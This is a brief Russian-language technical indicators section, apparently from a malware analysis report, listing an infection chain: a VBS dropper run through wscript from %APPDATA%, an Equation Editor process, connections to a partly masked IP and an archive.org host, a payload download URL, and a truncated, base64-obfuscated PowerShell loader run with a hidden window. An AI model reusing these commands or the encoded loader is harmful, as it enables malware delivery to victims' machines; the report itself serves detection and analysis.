Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\sweetbuddygirltodaysherewith.vBS"
- %APPDATA%\sweetbuddygirltodaysherewith.vbs
- '10#.#75.242.80':80
- 'ia#####0.us.archive.org':443
- http://10#.#75.242.80/430/sweetbuddygirltodaysherewith.tIF
- DNS ASK ia#####0.us.archive.org
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -command $Codigo = 'JiAoICRzaEVsbGlkWzFdKyRTSGVMbElEWzEzXSsnWCcpKCAoJ0FvbnVybCA9JysnIHh3cGh0dHBzOi8vaScrJ2E2MCcrJzAxJysnMDAnKycudScrJ3MuJysnYScrJ3JjaGl2ZScrJy5vcicrJ2cvJysnMjQvaXRlbXMvJysnZGV0Y... (со скрытым окном)